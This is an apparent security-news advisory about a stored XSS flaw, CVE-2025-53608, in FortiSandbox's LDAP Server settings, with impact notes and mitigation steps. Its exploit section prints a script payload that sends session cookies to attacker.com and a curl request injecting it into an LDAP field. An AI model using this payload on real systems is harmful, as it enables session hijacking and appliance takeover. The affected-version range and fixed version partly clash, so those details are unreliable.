FortiSandbox, Cross-site Scripting, CVE-2025-53608 (Low)

Listen to this Post

CVE-2025-53608 is a stored Cross-site Scripting (XSS) vulnerability found in the LDAP Server feature of Fortinet FortiSandbox . The vulnerability exists because the application fails to properly sanitize user-supplied input before using it in web page generation. An authenticated privileged attacker can exploit this by injecting malicious script code through crafted requests. When the injected code is permanently stored and later viewed by another user, it executes within their browser session, potentially allowing the attacker to hijack administrator sessions and ultimately execute arbitrary commands on the underlying system .
Platform: FortiSandbox
Version: 4.0-5.0.2
Vulnerability :Stored XSS
Severity: Low
date: 03/12/2026

Prediction: Patched already

What Undercode Say:

Analytics

The exploitation of CVE-2025-53608 hinges on injecting malicious JavaScript into the FortiSandbox GUI via the LDAP Server configuration. A successful attack can lead to a complete compromise of the FortiSandbox appliance, allowing threat actors to bypass malware analysis, exfiltrate sensitive data, and use the device as a pivot point into the internal network. Given the critical role of a sandbox in security infrastructure, this vulnerability is particularly high-risk despite its low severity score.

How Exploit:

An attacker with privileged access can inject a malicious payload into the LDAP Server fields. When an administrator views the configuration page, the script executes.

Example of a malicious payload that could be injected
This script attempts to exfiltrate session cookies to an attacker's server.

<script>
fetch('https://attacker.com/steal?cookie=' + document.cookie);
</script>

The crafted request to inject the payload might look like this
curl -k -X POST 'https://<fortisandbox>/ldap_config' \
--user 'privileged_user:password' \
--data 'ldap_server_name=<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>&ldap_server_ip=192.168.1.100'

Protection from this CVE

  1. Immediately upgrade to FortiSandbox version 4.4.8, 5.0.2, or later .
  2. Restrict access to the FortiSandbox GUI to only trusted administrative networks and users .
  3. Implement a Web Application Firewall (WAF) to filter malicious payloads targeting the LDAP configuration page .
  4. Enforce the principle of least privilege for all FortiSandbox accounts.

Impact

Successful exploitation allows an authenticated privileged attacker to perform cross-site scripting, potentially leading to session hijacking and arbitrary command execution on the FortiSandbox appliance . This could allow an attacker to disrupt malware analysis, steal sensitive information processed by the sandbox, and use the compromised system to launch further attacks within the organization’s network.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top